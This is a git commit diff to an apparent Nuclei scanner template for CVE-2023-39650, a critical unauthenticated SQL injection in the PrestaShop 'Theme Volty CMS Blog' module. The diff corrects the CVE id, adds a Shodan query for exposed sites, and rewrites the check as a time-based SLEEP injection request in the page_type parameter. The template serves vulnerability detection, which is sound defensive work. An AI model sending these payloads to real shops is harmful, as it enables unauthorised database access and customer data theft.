updated req. & matcher

patch-12
Ritik Chaddha 2024-09-16 17:26:11 +04:00 committed by GitHub
parent 443c618c81
commit 8ed3453a2b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 31 deletions

View File

@ -1,62 +1,42 @@
id: CVE-2023-39650
info:
name: PrestaShop Theme Volty CMS Blog SQL Injection
name: PrestaShop Theme Volty CMS Blog - SQL Injection
author: mastercho
severity: critical
description: |
In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-39650
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27847
cve-id: CVE-2023-39650
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
redirects: true
max-redirects: 3
max-request: 1
verified: true
framework: prestashop
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog
shodan-query: html:"/tvcmsblog"
tags: cve,cve2023,prestashop,sqli,tvcmsblog
http:
- raw:
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(6)))oqFL)--+yxoW HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_1>=5'
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
- 'duration>=6'
- 'status_code == 200 && contains_all(tolower(response), "tvcmsblog", "prestashop")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
condition: and